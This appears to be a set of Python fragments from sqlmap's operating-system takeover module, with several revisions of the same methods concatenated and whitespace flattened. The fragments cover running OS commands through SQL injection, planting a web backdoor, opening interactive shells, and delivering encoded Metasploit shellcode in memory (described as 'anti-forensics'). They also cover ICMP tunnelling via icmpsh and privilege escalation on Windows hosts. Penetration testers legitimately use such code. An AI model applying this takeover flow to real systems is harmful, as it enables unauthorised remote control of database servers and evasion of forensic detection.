def osCmd(self): if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct: web = False elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and Backend.isDbms(DBMS.MYSQL): infoMsg = "going to use a web backdoor for command execution" logger.info(infoMsg) web = True else: errMsg = "unable to execute operating system commands via " errMsg += "the back-end DBMS" raise sqlmapNotVulnerableException(errMsg) self.initEnv(web=web) if not web or (web and self.webBackdoorUrl is not None): self.runCmd(conf.osCmd) if not conf.osShell and not conf.osPwn and not conf.cleanup: self.cleanup()
def osShell(self): if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct: web = False elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and Backend.isDbms(DBMS.MYSQL): infoMsg = "going to use a web backdoor for command prompt" logger.info(infoMsg) web = True else: errMsg = "unable to prompt for an interactive operating " errMsg += "system shell via the back-end DBMS because " errMsg += "stacked queries SQL injection is not supported" raise sqlmapNotVulnerableException(errMsg) self.initEnv(web=web) if not web or (web and self.webBackdoorUrl is not None): self.shell() if not conf.osPwn and not conf.cleanup: self.cleanup()
def osShell(self): stackedTest() if kb.stackedTest or conf.direct: web = False elif not kb.stackedTest and kb.dbms == DBMS.MYSQL: infoMsg = "going to use a web backdoor for command prompt" logger.info(infoMsg) web = True else: errMsg = "unable to prompt for an interactive operating " errMsg += "system shell via the back-end DBMS" raise sqlmapNotVulnerableException(errMsg) self.initEnv(web=web) if not web or (web and self.webBackdoorUrl is not None): self.shell() if not conf.osPwn and not conf.cleanup: self.cleanup()
def osCmd(self): stackedTest() if kb.stackedTest or conf.direct: web = False elif not kb.stackedTest and kb.dbms == DBMS.MYSQL: infoMsg = "going to use a web backdoor for command execution" logger.info(infoMsg) web = True else: errMsg = "unable to execute operating system commands via " errMsg += "the back-end DBMS" raise sqlmapNotVulnerableException(errMsg) self.initEnv(web=web) if not web or (web and self.webBackdoorUrl is not None): self.runCmd(conf.osCmd) if not conf.osShell and not conf.osPwn and not conf.cleanup: self.cleanup()
class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): """ This class defines generic OS takeover functionalities for plugins. """ def __init__(self): self.cmdTblName = "sqlmapoutput" self.tblField = "data" Abstraction.__init__(self) def osCmd(self): if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct: web = False elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and Backend.isDbms(DBMS.MYSQL): infoMsg = "going to use a web backdoor for command execution" logger.info(infoMsg) web = True else: errMsg = "unable to execute operating system commands via " errMsg += "the back-end DBMS" raise sqlmapNotVulnerableException(errMsg) self.initEnv(web=web) if not web or (web and self.webBackdoorUrl is not None): self.runCmd(conf.osCmd) if not conf.osShell and not conf.osPwn and not conf.cleanup: self.cleanup() def osShell(self): if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct: web = False elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and Backend.isDbms(DBMS.MYSQL): infoMsg = "going to use a web backdoor for command prompt" logger.info(infoMsg) web = True else: errMsg = "unable to prompt for an interactive operating " errMsg += "system shell via the back-end DBMS because " errMsg += "stacked queries SQL injection is not supported" raise sqlmapNotVulnerableException(errMsg) self.initEnv(web=web) if not web or (web and self.webBackdoorUrl is not None): self.shell() if not conf.osPwn and not conf.cleanup: self.cleanup() def osPwn(self): goUdf = False self.checkDbmsOs() if Backend.isOs(OS.WINDOWS): msg = "how do you want to establish the tunnel?" msg += "\n[1] TCP: Metasploit Framework (default)" msg += "\n[2] ICMP: icmpsh - ICMP tunneling" valids = ( 1, 2 ) while True: tunnel = readInput(msg, default=1) if isinstance(tunnel, basestring) and tunnel.isdigit() and int(tunnel) in valids: tunnel = int(tunnel) break elif isinstance(tunnel, int) and tunnel in valids: break else: warnMsg = "invalid value, valid values are 1 and 2" logger.warn(warnMsg) else: tunnel = 1 debugMsg = "the tunnel can be established only via TCP when " debugMsg += "the back-end DBMS is not Windows" logger.debug(debugMsg) if tunnel == 2: isAdmin = runningAsAdmin() if not isAdmin: errMsg = "you need to run sqlmap as an administrator " errMsg += "if you want to establish an out-of-band ICMP " errMsg += "tunnel because icmpsh uses raw sockets to " errMsg += "sniff and craft ICMP packets" raise sqlmapMissingPrivileges, errMsg try: from impacket import ImpactDecoder from impacket import ImpactPacket except ImportError, _: errMsg = "sqlmap requires 'impacket' third-party library " errMsg += "in order to run icmpsh master. Download from " errMsg += "http://oss.coresecurity.com/projects/impacket.html" raise sqlmapMissingDependence, errMsg sysIgnoreIcmp = "/proc/sys/net/ipv4/icmp_echo_ignore_all" if os.path.exists(sysIgnoreIcmp): fp = open(sysIgnoreIcmp, "wb") fp.write("1") fp.close() else: errMsg = "you need to disable ICMP replies by your machine " errMsg += "system-wide. For example run on Linux/Unix:\n" errMsg += "# sysctl -w net.ipv4.icmp_echo_ignore_all=1\n" errMsg += "If you miss doing that, you will receive " errMsg += "information from the database server and it " errMsg += "is unlikely to receive commands sent from you" logger.error(errMsg) if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ): self.sysUdfs.pop("sys_bineval") if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) or conf.direct: web = False self.getRemoteTempPath() self.initEnv(web=web) if tunnel == 1: if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ): msg = "how do you want to execute the Metasploit shellcode " msg += "on the back-end database underlying operating system?" msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)" msg += "\n[2] Via shellcodeexec (file system way, preferred on 64-bit systems)" while True: choice = readInput(msg, default=1) if isinstance(choice, basestring) and choice.isdigit() and int(choice) in ( 1, 2 ): choice = int(choice) break elif isinstance(choice, int) and choice in ( 1, 2 ): break else: warnMsg = "invalid value, valid values are 1 and 2" logger.warn(warnMsg) if choice == 1: goUdf = True if goUdf: exitfunc="thread" else: exitfunc="process" self.createMsfShellcode(exitfunc=exitfunc, format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") if not goUdf: self.uploadShellcodeexec() if Backend.isOs(OS.WINDOWS) and conf.privEsc: if Backend.isDbms(DBMS.MYSQL): debugMsg = "by default MySQL on Windows runs as SYSTEM " debugMsg += "user, no need to privilege escalate" logger.debug(debugMsg) elif tunnel == 2: self.uploadIcmpshSlave(web=web) self.icmpPwn() elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and Backend.isDbms(DBMS.MYSQL): web = True infoMsg = "going to use a web backdoor to establish the tunnel" logger.info(infoMsg) self.initEnv(web=web) if self.webBackdoorUrl: if not Backend.isOs(OS.WINDOWS) and conf.privEsc: # Unset --priv-esc if the back-end DBMS underlying operating # system is not Windows conf.privEsc = False warnMsg = "sqlmap does not implement any operating system " warnMsg += "user privilege escalation technique when the " warnMsg += "back-end DBMS underlying system is not Windows" logger.warn(warnMsg) self.getRemoteTempPath() if tunnel == 1: self.createMsfShellcode(exitfunc="process", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") self.uploadShellcodeexec(web=web) elif tunnel == 2: self.uploadIcmpshSlave(web=web) self.icmpPwn() else: errMsg = "unable to prompt for an out-of-band session because " errMsg += "stacked queries SQL injection is not supported" raise sqlmapNotVulnerableException(errMsg) if tunnel == 1: if not web or (web and self.webBackdoorUrl is not None): self.pwn(goUdf) if not conf.cleanup: self.cleanup()
def osPwn(self): goUdf = False stackedTest() if kb.stackedTest: web = False self.initEnv(web=web) self.getRemoteTempPath() if kb.dbms in ( "MySQL", "PostgreSQL" ): msg = "how do you want to execute the Metasploit shellcode " msg += "on the back-end database underlying operating system?" msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)" msg += "\n[2] Stand-alone payload stager (file system way)" while True: choice = readInput(msg, default=1) if isinstance(choice, str) and choice.isdigit() and int(choice) in ( 1, 2 ): choice = int(choice) break elif isinstance(choice, int) and choice in ( 1, 2 ): break else: warnMsg = "invalid value, valid values are 1 and 2" logger.warn(warnMsg) if choice == 1: goUdf = True if goUdf: self.createMsfShellcode(exitfunc="thread", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") else: self.createMsfPayloadStager() self.uploadMsfPayloadStager() if kb.os == "Windows" and conf.privEsc: if kb.dbms == "MySQL": debugMsg = "by default MySQL on Windows runs as SYSTEM " debugMsg += "user, no need to privilege escalate" logger.debug(debugMsg) elif kb.os != "Windows" and conf.privEsc: # Unset --priv-esc if the back-end DBMS underlying operating # system is not Windows conf.privEsc = False warnMsg = "sqlmap does not implement any operating system " warnMsg += "user privilege escalation technique when the " warnMsg += "back-end DBMS underlying system is not Windows" logger.warn(warnMsg) elif not kb.stackedTest and kb.dbms == "MySQL": infoMsg = "going to use a web backdoor to execute the " infoMsg += "payload stager" logger.info(infoMsg) web = True self.initEnv(web=web) if self.webBackdoorUrl: if kb.os != "Windows" and conf.privEsc: # Unset --priv-esc if the back-end DBMS underlying operating # system is not Windows conf.privEsc = False warnMsg = "sqlmap does not implement any operating system " warnMsg += "user privilege escalation technique when the " warnMsg += "back-end DBMS underlying system is not Windows" logger.warn(warnMsg) self.getRemoteTempPath() self.createMsfPayloadStager() self.uploadMsfPayloadStager(web=True) else: errMsg = "unable to prompt for an out-of-band session via " errMsg += "the back-end DBMS" raise sqlmapNotVulnerableException(errMsg) if not web or (web and self.webBackdoorUrl is not None): self.pwn(goUdf) if not conf.cleanup: self.cleanup()